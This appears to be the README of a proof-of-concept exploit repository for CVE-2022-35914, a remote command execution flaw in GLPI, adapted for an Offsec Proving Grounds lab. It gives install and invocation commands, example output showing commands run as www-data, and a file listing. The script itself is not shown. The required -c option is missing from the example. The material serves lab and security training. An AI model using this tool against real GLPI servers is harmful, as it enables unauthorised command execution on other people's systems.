Modified for GLPI Offsec Lab: call_user_func, array_map, passthru# CVE-2022-35914_poc
Modified for GLPI Offsec Lab: call_user_func, array_map, passthru
## References
Modified to work for Proving Grounds Practice Lab: GLPI
- https://github.com/glpi-project/glpi/security/advisories/GHSA-c5gx-789q-5pcr
- https://github.com/cosad3s/CVE-2022-35914-poc/blob/main/CVE-2022-35914.py
- Mayfly Blog Post: https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914/
## Usage
```bash
pip3 install -r requirements.txt
```
```bash
./CVE-2022-35914.py -h
usage: CVE-2022-35914.py [-h] -u URL -c CMD [--check] [--user-agent USER_AGENT]
CVE-2022-35914 - GLPI - Modified for Offsec Lab: GLPI
options:
-h, --help show this help message and exit
-u URL URL to test
-c CMD Command to launch
--check Just check, no command execution.
--user-agent USER_AGENT Custom User-Agent
```
Example:
```bash
python3 CVE-2022-35914.py -u http://127.0.0.1
[+] Command output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
[4.0K] /data/pocs/7488e6165afce45aa98d8f82ac174cde3f29f851
├── [2.6K] CVE-2022-35914.py
├── [1.0K] README.md
└── [ 33] requirements.txt
0 directories, 3 files